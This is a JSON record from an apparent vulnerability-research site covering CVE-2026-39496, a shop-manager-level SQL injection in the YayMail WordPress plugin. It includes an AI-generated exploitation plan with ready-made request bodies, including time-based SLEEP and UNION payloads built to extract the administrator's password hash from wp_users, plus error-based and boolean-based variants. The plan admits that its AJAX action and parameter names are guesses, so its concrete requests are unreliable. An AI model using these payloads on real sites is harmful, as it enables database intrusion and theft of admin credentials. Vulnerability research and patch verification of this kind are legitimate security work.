[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fx6dkLR9hCOUGs1vmsZbJ0HKYlGKvNXp7JA54WMFgjvI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-39496","yaymail-authenticated-shop-manager-sql-injection","YayMail \u003C= 4.3.3 - Authenticated (Shop manager+) SQL Injection","The YayMail plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","yaymail",null,"\u003C=4.3.3","4.3.4","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-15 00:00:00","2026-04-15 21:25:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F83c97e9b-a5bc-4059-8355-f93a7a36037c?source=api-prod",32,[22,23,24,25],"assets\u002Fdist\u002Fyaymail\u002Fmanifest.json","assets\u002Fdist\u002Fyaymail\u002Fvendor_antd_form-9ff52ab8.js","assets\u002Fdist\u002Fyaymail\u002Fvendor_antd_table-57908d1d.js","assets\u002Fdist\u002Fyaymail\u002Fyaymail-main-909f2949.css","researched",false,3,"This research plan outlines the steps to verify and exploit an authenticated SQL injection vulnerability in the **YayMail – WooCommerce Email Customizer** plugin (CVE-2026-39496).\n\n## 1. Vulnerability Summary\nThe YayMail plugin (versions \u003C= 4.3.3) fails to properly sanitize or prepare user-supplied parameters before incorporating them into SQL queries. This allows an authenticated attacker with **Shop Manager** (or higher) privileges to inject arbitrary SQL commands. This is particularly critical as Shop Managers are intended to manage WooCommerce settings but should not have direct database access.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** Likely `yaymail_get_template`, `yaymail_get_history`, or `yaymail_save_template` (inferred from typical YayMail functionality).\n- **Vulnerable Parameter:** Likely a `template_id`, `id`, or `type` parameter (inferred).\n- **Authentication:** Required (Shop Manager+).\n- **Preconditions:** The plugin must be active, and at least one WooCommerce email template must exist or be accessible for editing.\n\n## 3. Code Flow\n1.  **Entry Point:** The Shop Manager triggers an AJAX request via the YayMail customizer interface.\n2.  **Hook Registration:** The plugin registers a handler via `add_action( 'wp_ajax_yaymail_...' )`.\n3.  **Data Retrieval:** The handler retrieves user input from `$_POST` or `$_GET`.\n4.  **Vulnerable Sink:** The input is concatenated into a string and passed to `$wpdb->get_results()`, `$wpdb->get_row()`, or `$wpdb->query()` without the use of `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nYayMail utilizes nonces for its AJAX operations. Since we have Shop Manager access, we must extract the nonce from the YayMail admin dashboard.\n\n1.  **Access Page:** Navigate to the YayMail settings page: `\u002Fwp-admin\u002Fadmin.php?page=yaymail-settings`.\n2.  **Identify Variable:** Look for the localized script variable (likely `yaymail_settings`, `yaymail_params`, or `YayMailData`).\n3.  **Execution Agent Steps:**\n    *   Login as Shop Manager.\n    *   Navigate to the YayMail settings page.\n    *   Run `browser_eval(\"window.yaymail_settings?.nonce\")` (inferred name) or inspect the page source for `wp_create_nonce`.\n\n## 5. Discovery Phase (Mandatory)\nSince the specific vulnerable function was not provided in the source snippet, the agent must first identify the sink:\n\n1.  **Search for Queries:**\n    ```bash\n    grep -rP '\\$wpdb->(get_results|get_row|query|get_var)\\s*\\([^;]*\\$(POST|GET|REQUEST)' wp-content\u002Fplugins\u002Fyaymail\u002F\n    ```\n2.  **Identify the AJAX Action:**\n    Identify the `add_action` call associated with the vulnerable function found in step 1.\n\n## 6. Exploitation Strategy\nAssuming the vulnerable action is `yaymail_get_template` and the parameter is `template_id`:\n\n### Step 1: Verification (Time-Based)\nSend a request to confirm the injection point exists.\n- **Payload:** `template_id=1 AND SLEEP(5)`\n- **Request:**\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  \"body\": \"action=yaymail_get_template&template_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=NONCE_HERE\"\n}\n```\n\n### Step 2: Extraction (UNION-Based)\nExtract the administrator's password hash from the `wp_users` table.\n1.  **Find Column Count:** Inject `ORDER BY 1, 2, ... n` until an error occurs.\n2.  **Extract Hash:**\n- **Payload (assuming 5 columns):** `1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -`\n- **Request:**\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"\u002Fwp-admin\u002Fadmin-ajax.php\",\n  \"headers\": { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  \"body\": \"action=yaymail_get_template&template_id=-1 UNION SELECT 1,user_pass,3,4,5 FROM wp_users WHERE ID=1-- -&nonce=NONCE_HERE\"\n}\n```\n\n## 7. Test Data Setup\n1.  **User Creation:** Create a user with the `shop_manager` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=shop_manager --user_pass=password123\n    ```\n2.  **Plugin Setup:** Ensure YayMail and WooCommerce are installed and active.\n3.  **Content:** Create at least one template in YayMail to ensure the underlying queries return rows if valid IDs are provided.\n\n## 8. Expected Results\n- **Success:** The HTTP response contains the administrator's `$P$` or `$wp$` hash in the field where a template name or property was expected.\n- **Blind:** If UNION is not possible, the response time is significantly delayed (>= 5 seconds) when the `SLEEP` payload is sent.\n\n## 9. Verification Steps\n1.  **Retrieve Hash via CLI:**\n    ```bash\n    wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"\n    ```\n2.  **Compare:** Verify that the hash obtained via the SQL injection match the hash retrieved via WP-CLI.\n\n## 10. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is enabled, use `updatexml()` or `extractvalue()` to force the database to leak the hash in an error message.\n- **Boolean-Based:** If output is suppressed, use `AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_pass LIKE '$P$%')` and check for the presence of a success\u002Ffail message in the JSON response.\n- **Vulnerable Parameters (Backup):** Check the following actions if `yaymail_get_template` is not the sink:\n    - `yaymail_duplicate_template`\n    - `yaymail_delete_template`\n    - `yaymail_get_history`\n    - `yaymail_export_template`","gemini-3-flash-preview","2026-04-18 03:37:25","2026-04-18 03:38:31",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.3.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags\u002F4.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyaymail.4.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags\u002F4.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyaymail.4.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyaymail\u002Ftags"]